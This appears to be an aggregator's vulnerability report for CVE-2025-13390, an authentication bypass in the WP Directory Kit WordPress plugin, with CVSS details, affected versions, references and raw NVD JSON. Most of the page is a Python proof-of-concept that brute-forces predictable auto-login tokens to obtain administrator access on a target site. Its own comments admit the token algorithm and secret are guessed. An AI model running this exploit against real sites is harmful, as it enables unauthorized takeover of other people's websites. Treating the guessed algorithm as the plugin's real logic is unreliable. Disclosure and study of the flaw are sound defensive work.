Security Vulnerability Report
CVE-2025-13390 CVSS 10.0 CRITICAL

Published: 2025-12-03 14:15:48
Last Modified: 2025-12-16 21:17:39

Description

The WP Directory Kit plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.4 due to incorrect implementation of the authentication algorithm in the "wdk_generate_auto_login_link" function. This is due to the feature using a cryptographically weak token generation mechanism. This makes it possible for unauthenticated attackers to gain administrative access and achieve full site takeover via the auto-login endpoint with a predictable token.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wpdirectorykit:wp_directory_kit:*:*:*:*:*:wordpress:*:* - VULNERABLE
WP Directory Kit <= 1.4.4 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13390 PoC - WP Directory Kit Authentication Bypass
# This PoC demonstrates how to exploit the weak token generation in auto-login function
import hashlib
import time
import requests
from datetime import datetime, timedelta

TARGET_URL = "https://vulnerable-site.com"
PLUGIN_PATH = "/wp-content/plugins/wp-directory-kit/"


def generate_predictable_token(user_id, timestamp=None):
    """
    Generate token using the weak algorithm (hypothetical based on CVE description)
    The actual algorithm may vary, this demonstrates the weak token generation concept
    """
    if timestamp is None:
        timestamp = int(time.time())
    # Weak token generation using predictable values
    secret = "wdk_secret_key"  # Default or known secret
    token_input = f"{user_id}_{timestamp}_{secret}"
    token = hashlib.md5(token_input.encode()).hexdigest()[:16]
    return token, timestamp


def exploit_auth_bypass(target_url, admin_user_id=1):
    """
    Exploit the authentication bypass vulnerability
    """
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-13390 - WP Directory Kit Auth Bypass")
    # Generate predictable tokens for different time windows
    current_time = int(time.time())
    for time_offset in range(-300, 300, 10):  # Check 5 minutes before and after
        timestamp = current_time + time_offset
        token, _ = generate_predictable_token(admin_user_id, timestamp)
        # Construct auto-login URL
        auto_login_url = f"{target_url}{PLUGIN_PATH}wdk-auto-login/?user_id={admin_user_id}&token={token}"
        print(f"[*] Testing token: {token} (timestamp: {timestamp})")
        try:
            response = requests.get(auto_login_url, allow_redirects=False, timeout=10)
            # Check for successful authentication indicators
            if response.status_code in [302, 303] and 'wp-admin' in response.headers.get('Location', ''):
                print(f"[+] SUCCESS! Valid token found: {token}")
                print(f"[+] Auto-login URL: {auto_login_url}")
                print(f"[+] Admin access granted!")
                return auto_login_url
            elif 'Set-Cookie' in response.headers:
                print(f"[+] Potential admin cookie obtained")
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
    print("[-] No valid token found in time window")
    return None


def main():
    """
    Main execution function
    """
    print("=" * 60)
    print("CVE-2025-13390 - WP Directory Kit Authentication Bypass")
    print("=" * 60)
    result = exploit_auth_bypass(TARGET_URL, admin_user_id=1)
    if result:
        print("\n[!] Vulnerability confirmed!")
        print(f"[!] Use the URL to gain admin access: {result}")
    else:
        print("\n[-] Exploitation failed or token generation algorithm different")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13390", "sourceIdentifier": "[email protected]", "published": "2025-12-03T14:15:48.280", "lastModified": "2025-12-16T21:17:39.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Directory Kit plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.4 due to incorrect implementation of the authentication algorithm in the \"wdk_generate_auto_login_link\" function. This is due to the feature using a cryptographically weak token generation mechanism. This makes it possible for unauthenticated attackers to gain administrative access and achieve full site takeover via the auto-login endpoint with a predictable token."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-303"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:wpdirectorykit:wp_directory_kit:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.4.4", "matchCriteriaId": "000C72F0-7DA8-40EC-B33F-6C87223D41EF"}]}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-13390", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3400599/wpdirectorykit/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://ryankozak.com/posts/cve-2025-13390/", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6598d171-e68c-4d2f-9cd1-f1574fa90433?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/d0n601/CVE-2025-13390", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}